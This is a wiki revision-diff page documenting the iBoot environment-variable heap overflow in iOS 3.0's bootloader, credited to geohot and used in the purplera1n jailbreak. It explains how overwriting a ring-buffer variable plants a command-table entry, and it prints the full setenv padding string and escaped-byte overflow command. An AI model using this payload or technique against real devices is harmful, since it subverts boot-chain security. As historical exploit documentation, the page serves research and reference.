Difference between revisions of "IBoot Environment Variable Overflow"

From The iPhone Wiki
Jump to: navigation, search
(Implementation in purplera1n: yes it should be there, the first one sets the env var and the second, the one you said shouldnt be there, actually performs th eexploit ;))
m
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
{{DISPLAYTITLE:iBoot Environment Variable Overflow}}
 
{{DISPLAYTITLE:iBoot Environment Variable Overflow}}
This is an exploit in the iBoot parsing of commands and environment variables.
+
This is an exploit in [[iBoot (Bootloader)|iBoot]]'s parsing of commands and environment variables.
   
 
== Credit ==
 
== Credit ==
Line 6: Line 6:
   
 
== Explanation ==
 
== Explanation ==
This is a heap overflow in 3.0's [[iBoot]]. I'm really tired right now and will write more tomorrow.
+
This is a heap overflow in 3.0's [[iBoot (Bootloader)|iBoot]].
   
 
My implementation saves the first 8 bytes in overruns(important or phone crashes), and overwrites the first 8 bytes of the '?' environment variable in the ring buffer. When the ring buffer is freed, it attempts to close the ring. In doing so, it changes the command table to have an entry at 0x41000000, where I then(must be done after or else cmd pointer gets overwritten) upload the geohot command. Run it and enjoy.
 
My implementation saves the first 8 bytes in overruns(important or phone crashes), and overwrites the first 8 bytes of the '?' environment variable in the ring buffer. When the ring buffer is freed, it attempts to close the ring. In doing so, it changes the command table to have an entry at 0x41000000, where I then(must be done after or else cmd pointer gets overwritten) upload the geohot command. Run it and enjoy.
Line 15: Line 15:
 
xxxx $a $a $a $a geohotaaaa \"\x04\x01\" \\ \"\x0c\" \\ \\ \\ \\ \\ \"\x41\x04\xA0\x02\" \\ \\ \\ \\ wwww;echo copyright;echo geohot
 
xxxx $a $a $a $a geohotaaaa \"\x04\x01\" \\ \"\x0c\" \\ \\ \\ \\ \\ \"\x41\x04\xA0\x02\" \\ \\ \\ \\ wwww;echo copyright;echo geohot
 
[[Category:Exploits]]
 
[[Category:Exploits]]
  +
[[Category:iBoot Exploits]]

Latest revision as of 16:15, 22 May 2022

This is an exploit in iBoot's parsing of commands and environment variables.

Credit

geohot

Explanation

This is a heap overflow in 3.0's iBoot.

My implementation saves the first 8 bytes in overruns(important or phone crashes), and overwrites the first 8 bytes of the '?' environment variable in the ring buffer. When the ring buffer is freed, it attempts to close the ring. In doing so, it changes the command table to have an entry at 0x41000000, where I then(must be done after or else cmd pointer gets overwritten) upload the geohot command. Run it and enjoy.

Implementation in purplera1n

setenv a bbbbbbbbb1bbbbbbbbb2bbbbbbbbb3bbbbbbbbb4bbbbbbbbb5bbbbbbbbb6bbbbbbbbb7bbbbbbbbb8bbbbbbbbb9bbbbbbbbbAbbbbbbbbbBbbbbbbbbbCbbbbbbbbbDbbbbbbbbbEbbbbbbbbbbbbtbbbbbbbbbubbbbbbbbbvbbbbbbbbbwbbbbbbbbbxbbbbbbbbbybbbbbbbbbzbbbbbbbbbHbbbbbbbbbIbbbbbbbbbJbbbbgeohotbbbbbbbbbLbbbbbbbbbMbbbbbbbbbNbbbbbbbbbObbbbbbbbbPbbbbbbbbbbQbbbbbbbbbRbbbbbbbbbSbbbbbbbbbTbbbbbbbbbUbbbbbbbbbVbbbbbbbbbWbbbbbbb

xxxx $a $a $a $a geohotaaaa \"\x04\x01\" \\ \"\x0c\" \\ \\ \\ \\ \\ \"\x41\x04\xA0\x02\" \\ \\ \\ \\ wwww;echo copyright;echo geohot